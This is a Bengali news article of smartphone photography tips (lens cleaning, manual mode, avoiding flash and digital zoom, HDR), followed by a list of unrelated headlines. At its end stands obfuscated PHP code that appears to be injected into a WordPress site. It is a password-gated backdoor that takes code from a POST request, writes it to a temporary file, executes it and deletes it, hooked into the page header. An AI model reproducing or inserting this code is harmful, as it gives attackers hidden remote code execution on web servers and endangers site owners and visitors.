শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

স্মার্টফোনে দুর্দান্ত ছবি তুলতে করণীয়

bdp_phoneঅনলাইন প্রতিবেদক: ছবি তুলতে এখন ব্যবহৃত হয় নানা মডেলের ডিজিটাল ক্যামেরা। তবে ডিজিটাল ক্যামেরার এই রাজত্বকে অনেকটাই হারিয়ে দিয়েছে স্মার্টফোন (Smartphone)। বিভিন্ন দামের নানা ব্রান্ড আর মডেলের স্মার্টফোন এখন সবার কাছে। তাই ছবি তোলার সখটা এখন সবাই মুহূর্তেই মিটিয়ে ফেলতে পারে। ডিজিটাল ক্যামেরার মত স্মার্টফোনেও দুর্দান্ত ছবি তোলা যায়। তবে সেক্ষেত্রে কিছু বিষয় খেয়াল রাখা প্রয়োজন। জেনে নিন সেরকম কিছু টিপস:

নিয়মিত লেন্স পরিস্কার রাখুন :
নিয়মিত আপনার স্মার্টফোনের ক্যামেরার লেন্সটি পরিস্কার রাখুন। ছবি তোলার আগে অন্তত একবার স্মার্টফোনের লেন্সটি ভালো করে মুছে নিন। তবে অবশ্যই নরম কাপড় দিয়ে পরিস্কার করতে হবে। কেননা ধুলা-গরমে ক্যামেরার লেন্সের সামনে জলীয় বাষ্প জমে থাকে বলে ছবি কিছুটা ঝাপসা হয়।

মোড বন্ধ রাখুন :
ভালো ছবি তুলতে হলে অটো মোড-এর ভরসায় থাকলে হবে না। ছবি তুলুন ম্যানুয়ালে। ইন্টারনেটে সার্চ করলেই জানতে পারবেন কম বা বেশি আলোয় ছবি তোলার জন্য লেন্স-অ্যাপাচার কত রাখতে হবে। স্মার্টফোনে দুর্দান্ত ছবি তুলতে চাইলে যে বিষয়গুলো খেয়াল রাখা প্রয়োজন।

ল্যান্ডস্কেপে ছবি তুলুন :
১৬:৯ মিডিয়া ফরম্যাটে ছবি তুলুন। ল্যান্ডস্কেপে ছবি তুললে সোশ্যাল মিডিয়ায় সেই ছবি দেখতেও ভালো লাগে।

ফ্ল্যাশ ব্যবহার করবেন না :
ফ্ল্যাশ মোডে ছবি তুললে যার ছবি তুলছেন বাড়তি আলোয়  তার মুখের আসল স্কিন টোন ঢাকা পড়ে যায়। চেষ্টা করুন ক্যামেরার এক্সপোজার বাড়িয়ে ছবি তুলতে।

ডিজিটাল জুম ব্যবহার করবেন না :
স্মার্টফোনের ক্যামেরায় জুম করে ছবি তুলবেন না। জুম করা মানেই ছবির সর্বনাশ। কোনো বস্তুর সামনে গিয়ে ছবি তুলতে না পারলে স্বাভাবিকভাবেই ছবি তুলুন, পরে কম্পিউটারে এডিট করার সময় ‘ক্রপ’ করে জুম করুন।

বেস্ট কোয়ালিটি সিলেক্ট করুন :
ক্যামেরা সেটিংসে গিয়ে ছবি তোলার জন্য সেরা কোয়ালিটি বেছে নিন। ছবির সাইজ বড় রাখুন।

এইচডিআর মোড অন :
হাই ডায়নামিক মোডে ছবি তুললে দারুন লাইট অ্যান্ড শ্যাডো ইফেক্ট পাবেন। তাই এইচডিআর মোডে ছবি তুলুন।

এ জাতীয় আরও খবর

রাতে বাঁচা-মরার ম্যাচে ভারতের মুখোমুখি হচ্ছে বাংলাদেশ

ঢাকা-টাঙ্গাইল মহাসড়‌কে ১৩ কি‌লো‌মিটার অংশে যানজট-ধীরগ‌তি‌

টেকনাফ সীমান্তে রাতভর মর্টার শেল-গুলির বিকট শব্দ

সেতু ভেঙে মাইক্রোবাস খালে, নিহত ৯

শেখ হাসিনা ও মোদির যৌথ বিবৃতি: সম্পর্ক, বাণিজ্য ও সহযোগিতার ওপর গুরুত্বারোপ

অসৎ ব্যবসায়ী ও দুর্নীতিবাজদের বিরুদ্ধে জিরো টলারেন্স: ওবায়দুল কাদের

ভারতে চিকিৎসা নিতে যাওয়াদের জন্য সুখবর আসছে

রাসেলস ভাইপার আতঙ্ক, যা বললেন স্বাস্থ্যমন্ত্রী

সেতু ভেঙে মাইক্রোবাস খালে, নিহত ১০ বরযাত্রী

বাংলাদেশ-ভারতের ১০ সমঝোতা স্মারক ও চুক্তি সই

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}